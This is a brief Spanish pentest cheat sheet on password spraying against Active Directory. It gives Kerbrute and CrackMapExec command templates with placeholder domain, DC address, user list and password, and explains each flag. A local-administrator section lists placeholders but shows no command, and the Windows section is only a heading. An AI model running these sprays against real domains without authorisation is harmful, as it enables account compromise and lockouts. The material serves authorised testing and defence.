Password spraying

Linux/Unix

Kerbrute

kerbrute passwordspray -d <ACME.LOCAL> --dc <IP-address-DC> <path-users> <password>

• passwordspray = prueba de una sola contraseña contra una lista de usuarios.

• -d = dominio.

• --dc = controlador de dominio.

  • <IP-address-DC> = dirección IP del controlador de dominio.

• <path-users> = ruta de archivo con listado de usuarios.

• <password> = contraseña.

CrackMapExec

Active Directory

crackmapexec smb <IP-address-DC> -u <path-users> -p <password> | grep +

• <IP-address-DC> = dirección IP del controlador de dominio.

• -u = usuarios.

  • <path-users> = ruta de archivo con listado de usuarios.

• -p = contraseña.

  • <password> = contraseña.

Administrador local

• <CIDR> = Classless Inter-Domain Routing.

• <hash> = hash de contraseña del usuario administrator.

Windows

DomainPasswordSpray